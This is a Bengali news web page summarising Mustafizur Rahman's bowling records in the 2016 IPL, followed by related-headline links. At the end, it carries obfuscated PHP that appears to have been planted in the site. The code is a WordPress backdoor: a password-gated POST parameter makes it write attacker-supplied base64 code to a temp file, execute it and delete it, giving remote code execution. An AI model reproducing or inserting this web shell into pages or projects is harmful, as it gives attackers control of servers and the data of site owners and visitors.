শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

আইপিএলে মুস্তাফিজের যত অর্জন

Sunrisers Hyderabad bowler Ben Cutting (R) celebrates with teammates the dismissal of Royal Challengers Bangalore batsman K L Rahul during the final Twenty20 cricket match of the 2016 Indian Premier League (IPL) between Royal Challengers Bangalore and Sunrisers Hyderabad at The M. Chinnaswamy Stadium in Bangalore on May 29, 2016.  / GETTYOUT / ----IMAGE RESTRICTED TO EDITORIAL USE - STRICTLY NO COMMERCIAL USE----- / AFP PHOTO / MANJUNATH KIRAN / ----IMAGE RESTRICTED TO EDITORIAL USE - STRICTLY NO COMMERCIAL USE----- / GETTYOUT

স্পোর্টস ডেস্ক : প্রথমবারের মত ইন্ডিয়ান প্রিমিয়ার লিগ (আইপিএল) খেলতে গিয়েই শিরোপা জিতেছেন মুস্তাফিজ। তার অসাধারণ বোলিং নৈপুণ্যে সানরাইজ হায়দারাবাদ পায় ট্রফি জয়ের স্বাদ। ইনজুরির কারণে কেবল একটি ম্যাচেই বসে ছিলেন মুস্তাফিজ। ইনজুরি না থাকলে হয়ত সে ম্যাচেও মাঠে নামতেন কাটার মাস্টার।

মূলত স্লোয়ার এবং কাটারে পারদর্শী এই বোলারকে নিলামে ১ কোটি ৪০ লক্ষ রুপি দিয়ে কিনে নেয় সানরাইজ হায়দারাবাদ। টুর্নামেন্টের প্রথম ম্যাচ থেকে গ্রুপ পর্বের শেষ ম্যাচটি পর্যন্ত দলের হয়ে মাঠে নেমেছেন মুস্তাফিজ।

দেখে নেয়া যাক এবারের আইপিএলের মুস্তাফিজের বোলিংয়ের কিছু কীর্তিঃ

১) ১৬ ম্যাচে ১৭ উইকেট নিয়ে আইপিএলে সর্বাধিক উইকেট পাওয়া বোলারদের তালিকায় মুস্তাফিজ রয়েছেন ৫ নম্বরে।

২) এক ইনিংসে বোলিংয়ে সব থেকে কম স্ট্রাইক রেটের বোলারদের তালিকাতে ১৯ নম্বরে রয়েছেন মুস্তাফিজ। মুম্বাই ইন্ডিয়ান্সের
বিপক্ষে ম্যাচে ৩ ওভার বল করে ১৬ রান দিয়েছিলেন তিনি যেখানে তার স্ট্রাইক রেট ছিল ৬।

৩) পুরো টুর্নামেন্টের সব থেকে কম স্ট্রাইক রেটের বোলারদের তালিকাতে মুস্তাফিজ রয়েছেন ২৯ নম্বরে। ১৬ ম্যাচে ৪২১ রান দিয়েছেন মুস্তাফিজ। যেখানে তার স্ট্রাইক রেট ২১.৫২।

৪) পুরো টুর্নামেন্টের সব থেকে কম ইকোনমির তালিকাতে মুস্তাফিজ রয়েছেন ৭ নম্বরে। ১৬ ম্যাচে তার ইকোনমি ৬.৯০। কিন্তু ১০ বা তার বেশি ইনিংসে বোলিং করা বোলারদের ভেতর মুস্তাফিজ রয়েছেন তালিকার শীর্ষে।

৫) ম্যাচে সব থেকে কম ইকোনমির তালিকাতে মুস্তাফিজ রয়েছেন ৪ নম্বরে। কিংস ইলেভেন পাঞ্জাবের বিপক্ষে ৪ ওভার বল করে ৯ রান দিয়েছিলেন। যেখানে তার ইকোনমি ছিল ২.২৫। এই ম্যাচে ম্যান অফ দ্য ম্যাচও হয়েছিলেন তিনি।

৬) এক ইনিংসে ১৭টি ডট বল দিয়ে আইপিএলের এক ম্যাচে সর্বাধিক ডট বল দেয়ার তালিকাতে রয়েছেন দুই নম্বরে।

৭) পুরো আইপিএল টুর্নামেন্টে ১৩৭টি ডট বল দিয়ে সর্বাধিক ডট বল দেয়ার তালিকাতে মুস্তাফিজ রয়েছেন দুই নম্বরে।

৮) ১৬টি ম্যাচে ১টি মেডেন ওভার করে আইপিএলে সর্বাধিক মেডেন ওভার করা বোলারদের তালিকাতে মুস্তাফিজ রয়েছেন ষষ্ঠ স্থানে (স্ট্রাইক রেটে এগিয়ে থেকে)।

৯) পুরো টুর্নামেন্টে বল প্রতি উইকেট নেয়ার তালিকাতে মুস্তাফিজ রয়েছেন ২৩ নম্বরে। ১৬ ম্যাচে মুস্তাফিজের গড় ২৪.৭৬।

প্রথমবার খেলতে গিয়েই এমন ঈর্শনীয় সাফল্যের কারণে সেরা উদীয়মান ক্রিকেটারের পুরস্কারও জেতেন মুস্তাফিজ।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}